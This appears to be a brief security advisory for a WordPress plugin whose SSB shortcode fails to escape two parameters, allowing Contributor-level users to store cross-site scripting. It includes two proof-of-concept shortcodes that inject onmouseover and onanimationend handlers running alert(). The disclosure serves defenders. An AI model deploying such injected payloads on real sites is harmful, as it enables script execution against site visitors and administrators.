The plugin did not escape the align and like_button_size parameters of its SSB shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.
[SSB align='" onmouseover="alert(/align/)//' like_button_size='4" onmouseover="alert(/like_button_size/)//']
[SSB align='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//' like_button_size='4" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']